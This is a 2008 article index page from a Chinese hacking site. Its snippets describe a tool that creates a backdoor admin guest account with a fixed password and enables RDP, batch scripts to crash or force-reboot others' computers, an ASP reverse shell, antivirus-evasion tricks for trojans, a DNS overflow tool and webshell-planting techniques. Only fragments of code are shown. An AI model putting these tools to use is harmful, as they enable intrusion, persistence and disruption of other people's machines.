|
|
|
by:wuyanfeng icesword 是通过 PspCidTable 这个表来遍历进程的, PspCidTable 是一个没有被 ntoskrnl.exe 导出的。这就涉及到如何定位 PspCidTable 的
| | 热门: 0 来源: 本站原创 添加日期: 2008-6-4 12:58:19 等级: 24 查看全文
|
|
|
|
这个漏洞参考http://www.milw0rm.com/exploits/5619Author: Greysign2008-5-24http://www.scanw.com/blog哈哈。标题吸引吗。修改代码请注意不能使用双引
| | 热门: 0 来源: 本站原创 添加日期: 2008-5-26 8:11:59 等级: 32 查看全文
|
|
|
|
开启激活guest,密码为cooldiyer,加管理员组,并且可以多用户登录 // xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer//#pragma comment
| | 热门: 0 来源: 本站原创 添加日期: 2008-5-26 8:11:10 等级: 33 查看全文
|
|
|
|
第一个:让别人内存OVER(逼他重启)@echo offstart cmd%0 就这3行了第二个:让对方重启指定次数(害人专用)@echo offif not exist c:\1.txt echo. >c:\1.txt &
| | 热门: 0 来源: 本站原创 添加日期: 2008-5-12 8:23:48 等级: 59 查看全文
|
|
|
|
On Error Resume NextSet Arg=Wscript.argumentsIf Arg.count=0 then Wscript.quit-------------------Enjoy itCode By NetPatch
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-28 9:01:31 等级: 24 查看全文
|
|
|
|
来源:安全中国最近练习脱壳,将用98的记事本用Armadillo 3.10加壳作试验,52K --> 324K脱壳后文件大小达到了588K,比脱壳前竟然大了10倍多,于是想将之减肥,查看雪精华,没找到这方
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-25 0:07:41 等级: 21 查看全文
|
|
|
|
原理:用ASP实现反向连接,客户端shell.exe大小6K,控制端console.asp大小1.75K详解:灵感来自在入侵渗透内网时需反向连接但没有公网IP的时候,想到ASP的Application对象功能之强大,所以产生以下想法肉机执行
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-21 3:28:20 等级: 36 查看全文
|
|
|
|
Arm3.61版后加强了对IAT解码的保护,这里只谈到IAT解码前的保护代码跟踪心得。 本次使用的程序是goodmorning发在http://tongtian.net/pediybbs/viewtopic.php?t=5395
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-21 3:27:30 等级: 11 查看全文
|
|
|
|
大家仔细看看吧!/* TerminateThread.c &nb
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-17 9:36:25 等级: 46 查看全文
|
|
|
|
来源:安全中国1. 断点: 所谓断点就是程序被中断的地方,这个词对于解密者来说是再熟悉不过了。那么什么又是中断呢?中断就是由于有特殊事件(中断事件)发生,计算机暂停当前的任务(即程序),转而去执行另外的任务(中断服务程
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-16 0:22:04 等级: 61 查看全文
|
|
|
|
作者:lcx来源:vbs小铺来自微软脚本专家:Set objSession = CreateObject(Microsoft.Update.Session)Set objSearcher = objSession.CreateUpdateS
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-16 0:21:32 等级: 17 查看全文
|
|
|
|
使用如下代码可将系统中的atapi.sys (如果你的机器磁盘PORT驱动是atapi.sys的话,如果是scsiport的话会有不同)加载到系统中。模块名为dump_atapi.sys(如果已配置了生成dump则无法生效)HMODULE
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-16 0:06:02 等级: 18 查看全文
|
|
|
|
全部文件下载:http://www.icehack.org/attachment.aspx?attachmentid=56vbs源码: 以下是引用片段:code by lcxDim WshShell, oExec,ip,portip= In
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-9 21:28:50 等级: 31 查看全文
|
|
|
|
某些杀毒软件会把正常的asp文件误认为是asp木马文件,而自动删除,影响正常使用。 下面方法可能会有效避免被杀毒软件删除 把以下是引用片段: dim tStream set tStream =&nbs
| | 热门: 0 来源: 本站原创 添加日期: 2008-4-5 19:05:57 等级: 22 查看全文
|
|
|
|
由于前几天在学校图书馆,找到一本病毒分析的书,让我灵感大发,于是就有了此文,下面请听我一一道来。 在现在这个杀毒软件横行的时代。木马在发布没几天,就会被各大杀毒软件盯上,然后小黑们就只能无奈的做着免杀,加花指令、加
| | 热门: 0 来源: 本站原创 添加日期: 2008-3-31 0:40:21 等级: 52 查看全文
|
|
|
|
@shift 1@ setlocal@ cls@ color A@ title DNS批量溢出个人版@echo ================================================================
| | 热门: 0 来源: 本站原创 添加日期: 2008-3-28 8:07:11 等级: 47 查看全文
|
|
|
|
beta 3 final release版增加了最终版添加的功能比较多,改动的地方也很多,增加了一些常用的功能函数:1、获取数据库服务器信息,包括一些扩展存储是否可用(但有的时候并不是很准确)2、log备份获取webshell3、差异备份获
| | 热门: 0 来源: 本站原创 添加日期: 2008-3-28 8:06:28 等级: 57 查看全文
|
|
|
|
当年的吐血力做。。。现在看来我还是觉得思路很巧妙(那时不象现在对脚本防火墙看得很严)<html><script language=vbs>on error resume nextrem czy a sci
| | 热门: 0 来源: 本站原创 添加日期: 2008-3-23 6:41:35 等级: 1012 查看全文
|
|
|
|
Edit控件密码窗口的秘密 &nb
| | 热门: 0 来源: 本站原创 添加日期: 2008-3-22 7:19:48 等级: 52 查看全文
|
|
|
|
网上有些MD5_CTX结构的定义应该是有问题的./* Data structure for MD5 (Message-Digest) computation */type
| | 热门: 0 来源: 本站原创 添加日期: 2008-3-22 7:18:39 等级: 34 查看全文
|
共 694 篇文章 首页 | 上一页 | 6 7 8 9 10 11 12 13 14 | 下一页 | 尾页 20篇文章/页 转到第 页 | |
|
| |
|
|
| |
|
|
| |
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com
站长:利客 Email:hookbase@163.com Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号 |
|
| |
|
|
| |
|
| |
